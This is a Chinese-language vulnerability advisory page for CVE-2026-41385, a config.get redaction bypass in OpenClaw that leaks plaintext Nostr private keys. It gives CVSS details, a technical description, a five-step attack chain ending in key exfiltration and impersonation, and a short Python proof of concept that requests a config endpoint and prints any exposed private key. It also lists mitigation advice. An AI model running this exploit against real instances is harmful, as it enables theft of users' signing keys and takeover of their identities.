CVE-2026-41385 CVSS 6.5 中危

CVE-2026-41385 OpenClaw敏感信息泄露漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41385

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前的版本存在敏感信息泄露漏洞。该软件将Nostr协议的私钥以明文形式存储在配置文件中，且 `config.get` 方法存在逻辑缺陷，导致绕过了数据脱敏机制。攻击者可利用该漏洞获取未编辑的配置数据，进而窃取用于Nostr协议签名的明文私钥，严重威胁用户数据安全。

技术细节

该漏洞源于OpenClaw应用程序在配置数据处理方面的设计缺陷。在受影响的版本中，系统将Nostr协议所需的私钥以明文形式存储在配置文件中，且未能对敏感信息的读取接口实施严格的保护。具体而言，`config.get` 方法在返回数据时，绕过了本应生效的编辑机制，直接向调用者暴露了原始配置对象。攻击者无需进行复杂的权限提升，只需利用低权限账户访问相关API或管理接口，即可触发该漏洞。一旦获取到未脱敏的配置数据，攻击者便能提取其中的Nostr私钥。鉴于Nostr协议的去中心化特性，私钥即身份，泄露后攻击者可完全控制用户身份，发送恶意信息或解密历史通讯，且无法通过中心化服务器撤销，后果严重。

攻击链分析

STEP 1

Reconnaissance

Identify a target running a vulnerable version of OpenClaw (< 2026.3.31).

STEP 2

Access

Obtain low-level privileges (PR:L) or access to the application interface where config.get can be invoked.

STEP 3

Exploitation

Trigger the vulnerable config.get method to retrieve the configuration object, bypassing redaction logic.

STEP 4

Exfiltration

Parse the returned configuration data to extract the plaintext Nostr private key.

STEP 5

Impact

Use the stolen private key to impersonate the victim on the Nostr network, sign messages, or decrypt data.

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-41385
# Description: Exploits the config.get redaction bypass to leak the Nostr private key.

import requests
import json

def trigger_leak(target_url):
    # The vulnerable endpoint allows fetching raw config
    # In a real scenario, this might be an API endpoint or a specific RPC call
    endpoint = f"{target_url}/api/config"
    
    headers = {
        "User-Agent": "CVE-2026-41385-Scanner",
        "Content-Type": "application/json"
    }

    try:
        # Sending a request to retrieve configuration
        # The vulnerability is that the response contains the raw 'privateKey'
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            data = response.json()
            
            # Check if the Nostr private key is exposed
            if 'nostr' in data and 'privateKey' in data['nostr']:
                print("[+] Vulnerability Confirmed!")
                print(f"[+] Leaked Private Key: {data['nostr']['privateKey']}")
                return True
            else:
                print("[-] Key not found in response, might be patched or different config structure.")
                return False
        else:
            print(f"[-] HTTP Error: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[-] Error during exploit: {e}")
        return False

if __name__ == "__main__":
    # Replace with actual target instance
    target = "http://localhost:8080"
    trigger_leak(target)

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

在未升级前，建议通过网络访问控制列表（ACL）严格限制对配置API的访问，仅允许受信任的管理员IP访问。同时，应全面审计系统日志，检查是否存在针对配置接口的异常访问记录，一旦发现私钥泄露迹象，必须立即废弃旧密钥并生成新密钥。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表